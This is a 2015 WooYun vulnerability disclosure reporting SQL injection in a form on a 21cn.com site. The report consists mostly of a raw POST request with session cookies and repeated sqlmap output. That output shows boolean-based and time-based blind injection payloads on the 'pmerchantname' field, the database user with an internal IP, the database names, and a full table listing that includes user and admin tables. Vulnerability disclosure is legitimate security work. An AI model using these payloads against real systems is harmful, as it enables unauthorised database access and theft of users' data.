当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127189

漏洞标题:世纪龙某处表单存在SQL注射漏洞

相关厂商:世纪龙信息网络有限责任公司

漏洞作者: 路人甲

提交时间:2015-07-16 15:47

修复时间:2015-08-30 22:54

公开时间:2015-08-30 22:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-16: 细节已通知厂商并且等待厂商处理中
2015-07-16: 厂商已经确认,细节仅向厂商公开
2015-07-26: 细节向核心白帽子及相关领域专家公开
2015-08-05: 细节向普通白帽子公开
2015-08-15: 细节向实习白帽子公开
2015-08-30: 细节向公众公开

简要描述:

详细说明:

POST /home/preview HTTP/1.1
Content-Length: 946
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_DTQUTVUHKJ
X-Requested-With: XMLHttpRequest
Referer: http://ts.21cn.com/
Cookie: PHPSESSID=06f83672ea38aac0b7e54abeb038a20f; JSESSIONID=aaa9wVJf_6Gee7WcYBv6u
Host: ts.21cn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_LFUYYLIYJS
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--

漏洞证明:

sqlmap identified the following injection points with a total of 126 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
current user:	None
current user is DBA:    False
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
current user:    'jtsuser@10.29.5.33'
current user is DBA:    False
available databases [3]:
[*] information_schema
[*] jutousu
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
Database: jutousu
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| iic_user                       | 82710   |
| iic_reply                      | 54781   |
| iic_log                        | 49619   |
| iic_digg                       | 46570   |
| iic_post_sync                  | 18118   |
| iic_user_addres                | 17637   |
| iic_post                       | 15565   |
| iic_digg_20131224              | 13041   |
| iic_post_com                   | 12930   |
| iic_reply_sync                 | 6894    |
| iic_area                       | 3407    |
| iic_collective_digg            | 2153    |
| iic_case                       | 941     |
| iic_access                     | 936     |
| iic_com                        | 764     |
| iic_wxuser                     | 750     |
| iic_recom                      | 731     |
| iic_collective_reply           | 672     |
| iic_post_dealwith_satisfaction | 640     |
| iic_captcha                    | 531     |
| iic_merchant                   | 472     |
| iic_node                       | 278     |
| iic_movice                     | 188     |
| iic_redblackdigg               | 100     |
| iic_ipadmin                    | 99      |
| iic_feedback                   | 95      |
| iic_collective                 | 93      |
| iic_postkeyword                | 93      |
| iic_cat                        | 61      |
| iic_reply_link                 | 60      |
| iic_collectivetimeline         | 59      |
| iic_collectivenews             | 43      |
| iic_hotpost                    | 42      |
| iic_team                       | 42      |
| iic_article                    | 40      |
| iic_role_account               | 36      |
| iic_account                    | 30      |
| iic_specialcolumn              | 27      |
| iic_collectiveslide            | 26      |
| iic_proc                       | 26      |
| iic_redblacklist               | 25      |
| iic_keyword                    | 12      |
| iic_collectiveweibo            | 11      |
| iic_admin                      | 8       |
| iic_role                       | 6       |
| iic_ip                         | 4       |
| iic_experttype                 | 3       |
| iic_arc                        | 2       |
| iic_wbsync                     | 2       |
| iic_filter                     | 1       |
+--------------------------------+---------+

修复方案:

修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-16 22:53

厂商回复:

感谢您对我们业务安全的关注,根据您的报告,问题已着手处理,谢谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-24 12:21 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    对不起,漏洞详情复制的时候复制错了,已联系乌云修复。

  2. 2015-07-24 12:22 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    对不起,漏洞详情复制的时候复制错了,已联系乌云修改。